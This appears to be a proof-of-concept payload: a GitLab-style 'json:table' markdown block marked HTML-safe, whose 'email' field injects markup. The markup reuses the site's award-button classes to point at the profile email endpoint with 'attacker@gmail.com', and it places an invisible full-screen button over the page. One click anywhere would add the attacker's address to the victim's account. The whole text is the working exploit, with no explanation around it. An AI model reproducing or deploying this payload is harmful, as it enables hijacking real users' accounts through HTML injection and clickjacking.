```json:table
{
  "fields": [
    {"key": "name", "label": "Name"},
    {"key": "email", "label": "Email"},
    {"key": "role", "label": "Role"}
  ],
  "items": [
    {
      "name": "<b>Bob</b>",
      "email": "<div class=\"awards js-awards-block gl-gap-3 gl-py-2\" data-award-url=\"/-/profile/emails?email%5Bemail%5D=attacker%40gmail.com\"><button class=\"selected js-emoji-btn\" data-title=\"You\" style=\"z-index:99999999999999999;cursor:auto;position:fixed;transform:translate3d(-2000px,-5000px,0px);width:10000px;height:20000px;background:transparent\" type=\"button\"><gl-emoji class=\"emoji-btn\" ></gl-emoji></button></div>",
      "role": "User"
    }
  ],
  "isHtmlSafe": true
}
```